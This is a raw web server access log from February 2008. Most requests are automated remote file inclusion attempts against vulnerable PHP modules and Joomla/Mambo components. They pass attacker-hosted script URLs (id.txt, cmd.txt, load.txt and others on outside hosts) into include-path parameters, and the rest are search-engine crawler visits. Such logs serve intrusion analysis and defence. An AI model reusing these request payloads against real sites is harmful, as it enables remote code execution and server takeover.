72.9.152.104 - - [11/Feb/2008:00:01:45 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.115.89.60 - - [11/Feb/2008:00:01:52 -0800] "GET /logs/access_070806.log//display.php?lang=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [11/Feb/2008:00:02:01 -0800] "GET //display.php?lang=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.115.89.60 - - [11/Feb/2008:00:02:09 -0800] "GET /logs//display.php?lang=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:02:40 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:02:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:02:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.149.224.227 - - [11/Feb/2008:00:04:24 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [11/Feb/2008:00:04:24 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.149.224.227 - - [11/Feb/2008:00:04:24 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:04:39 -0800] "GET /logs/access_070917.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:04:39 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:04:39 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:00:06:10 -0800] "GET /logs/access_070806.log/include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:00:06:11 -0800] "GET /include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:00:06:11 -0800] "GET /logs/include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.142.25.74 - - [11/Feb/2008:00:07:15 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.galf.org"
83.142.25.74 - - [11/Feb/2008:00:07:15 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:08:09 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:08:10 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:08:10 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:08:55 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:08:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:08:55 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET /logs/access_070709.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:09:45 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.55.166.250 - - [11/Feb/2008:00:10:06 -0800] "GET /logs/access_070806.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://mundobc67.dyndns.org/modules/coppermine/albums/userpics/mundo2005/Jeux/us.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:13:09 -0800] "GET /logs/access_070917.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:13:10 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:13:10 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:13:23 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.232.68.10 - - [11/Feb/2008:00:13:23 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.115.89.60 - - [11/Feb/2008:00:13:23 -0800] "GET /logs/access_070806.log//inc.php?inc=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.75.63.66 - - [11/Feb/2008:00:14:51 -0800] "GET /logs/access_070806.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:16:55 -0800] "GET /logs/access_070806.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:16:55 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:16:56 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:00:18:50 -0800] "GET /logs/access_070917.log/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:00:18:50 -0800] "GET /logs/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:00:18:57 -0800] "GET /logs/access_070917.log/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.152.104 - - [11/Feb/2008:00:18:58 -0800] "GET /logs/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:24:05 -0800] "GET /logs/access_070917.log//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:24:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:24:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.203.143.131 - - [11/Feb/2008:00:25:42 -0800] "GET /logs/access_070709.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:00:25:53 -0800] "GET /include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:00:25:53 -0800] "GET /include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
74.6.24.237 - - [11/Feb/2008:00:26:37 -0800] "GET /logs/access_071231.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.127.223.71 - - [11/Feb/2008:00:35:59 -0800] "GET /logs/access_070709.log//modules/4nAlbum/public/displayCategory.php?basepath=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.127.223.71 - - [11/Feb/2008:00:36:01 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
222.127.223.71 - - [11/Feb/2008:00:36:03 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://gw-gold.net/dragoc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.56.153.224 - - [11/Feb/2008:00:37:49 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.clanstug.com.ar/vwar/convert/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
77.91.224.17 - - [11/Feb/2008:00:39:58 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [11/Feb/2008:00:40:47 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [11/Feb/2008:00:40:47 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
202.171.48.7 - - [11/Feb/2008:00:40:59 -0800] "GET /logs/access_070806.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.s-logistic.ru/.debug/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.91.224.17 - - [11/Feb/2008:00:41:57 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [11/Feb/2008:00:42:33 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [11/Feb/2008:00:43:24 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.7 - - [11/Feb/2008:00:46:40 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
77.91.224.17 - - [11/Feb/2008:00:47:42 -0800] "GET /logs/ HTTP/1.1" 200 6057 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:00:48:44 -0800] "GET /include.php?path[docroot]=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
77.91.224.7 - - [11/Feb/2008:00:49:18 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)" "www.galf.org"
211.255.32.189 - - [11/Feb/2008:00:56:53 -0800] "GET /logs/access_070709.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [11/Feb/2008:00:56:54 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [11/Feb/2008:00:56:55 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.165.133 - - [11/Feb/2008:00:57:12 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.1streconbn.net/modules/Universal/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
211.255.32.189 - - [11/Feb/2008:01:02:37 -0800] "GET /logs/access_070806.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:01:02:41 -0800] "GET /logs/access_070806.log/include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:01:02:42 -0800] "GET /logs/include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:01:02:42 -0800] "GET /logs/access_070806.log/include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
83.133.96.246 - - [11/Feb/2008:01:02:42 -0800] "GET /logs/include.php?path[docroot]=http://worned01.iespana.es/bds/sefe.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
208.186.169.183 - - [11/Feb/2008:01:04:35 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
208.186.169.183 - - [11/Feb/2008:01:04:35 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.25.205 - - [11/Feb/2008:01:05:20 -0800] "GET /logs/access_070716.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.65.116.80 - - [11/Feb/2008:01:11:04 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [11/Feb/2008:01:11:10 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [11/Feb/2008:01:11:10 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
216.65.116.80 - - [11/Feb/2008:01:11:15 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.sternkinder2005.de/video/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
74.6.28.220 - - [11/Feb/2008:01:13:38 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.22.162.60 - - [11/Feb/2008:01:19:42 -0800] "GET /logs/!rfihttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
69.22.162.60 - - [11/Feb/2008:01:19:43 -0800] "GET /!rfihttp://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
209.216.249.194 - - [11/Feb/2008:01:19:59 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.netspeedns.net//images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.216.249.194 - - [11/Feb/2008:01:20:00 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.netspeedns.net//images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
209.216.249.194 - - [11/Feb/2008:01:20:00 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.netspeedns.net//images/.admin/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
62.2.100.138 - - [11/Feb/2008:01:21:51 -0800] "GET /logs/access_070806.log//include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:21:51 -0800] "GET //include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:21:52 -0800] "GET /logs//include.php?path[docroot]=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.106.131.26 - - [11/Feb/2008:01:22:53 -0800] "GET /logs/index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
87.106.131.26 - - [11/Feb/2008:01:22:53 -0800] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
74.6.22.10 - - [11/Feb/2008:01:23:32 -0800] "GET /labia/?N=D HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.200.82.15 - - [11/Feb/2008:01:23:58 -0800] "GET /logs/access_070917.log//administrator/components/com_comprofiler/plugin.class.php?&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.82.15 - - [11/Feb/2008:01:24:03 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.82.15 - - [11/Feb/2008:01:24:08 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?&mosConfig_absolute_path=http://test.iearn.uz/test.iearn.uz/help.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.89.247.10 - - [11/Feb/2008:01:25:00 -0800] "GET /logs/access_070917.log/index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pirateindustries.co.uk/smf/Themes/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.69.254.244 - - [11/Feb/2008:01:25:00 -0800] "GET /logs/access_070917.log/index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.69.254.244 - - [11/Feb/2008:01:25:00 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pirateindustries.co.uk/smf/Themes/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.89.247.10 - - [11/Feb/2008:01:25:00 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.89.247.10 - - [11/Feb/2008:01:25:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pirateindustries.co.uk/smf/Themes/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.69.254.243 - - [11/Feb/2008:01:25:07 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_forum&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.53.24.226 - - [11/Feb/2008:01:26:23 -0800] "GET /index.php?option=com_a6mambocredits&Itemid=&mosConfig_absolute_path=http://www.progressinternational.biz/contentimage/banners/bannerCrewConnect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:27:55 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:27:55 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:27:56 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:28:01 -0800] "GET /logs/access_070806.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:28:01 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.2.100.138 - - [11/Feb/2008:01:28:01 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://worned01.iespana.es/bds/allid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.145.108 - - [11/Feb/2008:01:32:53 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
80.74.145.108 - - [11/Feb/2008:01:32:53 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.no-such-thing.net/fandom/themes/os/os_1? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
